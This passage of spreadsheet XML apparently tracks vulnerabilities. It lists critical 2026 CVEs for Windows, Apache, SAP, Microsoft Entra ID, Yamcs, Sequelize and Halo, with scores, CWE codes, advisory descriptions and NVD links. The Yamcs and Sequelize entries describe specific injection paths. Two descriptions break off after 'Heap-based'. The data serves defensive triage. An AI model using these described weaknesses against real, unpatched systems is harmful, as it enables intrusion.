      </c>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs inserts templateArgs from POST /api/instances and PATCH /api/instances/{instance} into YAML through VarStatement.append in yamcs-core/src/main/java/org/yamcs/templating/VarStatement.java without YAML-context escaping. The rendered configuration is parsed by YamcsServer.createInstance and loaded by YamcsServerInstance, allowing an attacker to inject a services entry for org.yamcs.ProcessRunner. Deployments without security.yaml expose the operation through the guest superuser, while secured deployments require SystemPrivilege.CreateInstances. Successful exploitation executes commands as the Yamcs service account. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55559</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56207</t>
        </is>
      </c>
      <c r="C62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G62" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H62" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I62" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>Signature of Bearer token is not verified in last step of SAML2 authentication for Impala's hs2-http interface, allowing altering user name and acting as another user.
This issue affects Apache Impala: &gt;=4.0.0.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56207</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57967</t>
        </is>
      </c>
      <c r="C63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G63" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can craft a CORE protocol SESSION_REATTACH packet to steal an existing session and assume ongoing execution of the previously authenticated session.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57967</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="C64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G64" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Message Server does not sufficiently validate the authenticity of internal application server components during registration. An unauthenticated attacker with network access to the affected service could exploit this weakness to register an unauthorized component and potentially perform unauthorized actions within the application environment, resulting in a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62916</t>
        </is>
      </c>
      <c r="C65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G65" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H65" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="I65" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62916</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67919</t>
        </is>
      </c>
      <c r="C66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G66" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>An issue in Halo 2.25.4 allows a remote attacker to execute arbitrary code via the PluginEndpoint.java, installFromUri method, and DefaultPluginApplicationContextFactory components</t>
        </is>
      </c>
      <c r="M66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67919</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="C67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G67" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69240</t>
        </is>
      </c>
      <c r="C68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G68" s="5" t="inlineStr">
        <is>
          <t>oracle, node.js</t>
        </is>
      </c>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>Sequelize is a Node.js ORM tool. Prior to 6.37.4, SQL injection is possible with strings only if dialect is set to oracle. The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE. In the Oracle dialect, when val is a string and starts with TO_TIMESTAMP or TO_DATE, escape returns val directly instead of replacing single quotes. An attacker can inject arbitrary SQL expressions through an application value that reaches this escape path. This issue is fixed in version 6.37.4.</t>
        </is>
      </c>
      <c r="M68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69240</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="C69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G69" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="C70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G70" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="C71" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G71" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="C72" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G72" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="C73" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G73" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="C74" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G74" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="C75" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G75" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="C76" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G76" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="C77" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G77" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="C78" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G78" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="C79" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G79" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="C80" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G80" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="C81" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G81" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="C82" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G82" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="C83" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G83" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="C84" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G84" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
